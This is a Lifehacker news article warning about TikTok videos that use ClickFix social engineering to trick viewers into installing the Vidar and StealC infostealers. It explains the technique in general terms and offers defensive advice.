In recent years, TikTok has become a prime target for scammers and cyber attackers spreading various forms of malware, and the latest shady campaign promotes instructional videos that trick users into downloading infostealers to their devices via ClickFix attacks.
The scheme, identified by Trend Micro and reported by Bleeping Computer, instructs users to execute commands to activate Windows and Microsoft Office or premium features in CapCut and Spotify. One video is captioned “Boost Your Spotify Experience Instantly — Here’s How!” and has nearly half a million views.
These videos seem to be AI generated and, while the software they discuss is legitimate, the activation steps they outline are not, and will ultimately lead users to infect their devices with Vidar and StealC malware.
TikTok’s engagement algorithm makes it easy for such malicious videos to spread. In the past, cybercriminals have used TikTok’s trending “Invisible Challenge” to spread WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake cryptocurrency giveaways posted on TikTok used deepfakes of Elon Musk (and themes around SpaceX and Tesla) to scam users into paying “activation” deposits using Bitcoin.
How TikTok ClickFix attacks work
ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command with malicious code. Users will see a pop-up notification about a technical problem with instructions to copy and run a command (commonly a PowerShell script) to “fix” the issue. The attack most often targets Windows users, but it has been employed on macOS and Linux too.
Be wary of following instructional videos you’re served on TikTok (as well as unsolicited technical content in general). Check the source, and only engage with those that are legitimate, like from the developer itself. You should also look for signs of AI-generated content, which may be used to spread malware widely and rapidly. There’s no malicious code actually embedded in or delivered by these instructional videos—the scheme is dependent on social engineering via verbal directions—making the threat technically harder to detect.
Lifehacker has been a go-to source of tech help and life advice since 2005. Our mission is to offer reliable tech help and credible, practical, science-based life advice to help you live better.
© 2001-2025 Ziff Davis, LLC., A ZIFF DAVIS COMPANY. ALL RIGHTS RESERVED.
Lifehacker is a federally registered trademark of Ziff Davis and may not be used by third parties without explicit permission. The display of third-party trademarks and trade names on this site does not necessarily indicate
any affiliation or the
endorsement of Lifehacker. If you click an affiliate link and buy a product or service, we may be paid a fee by that merchant.
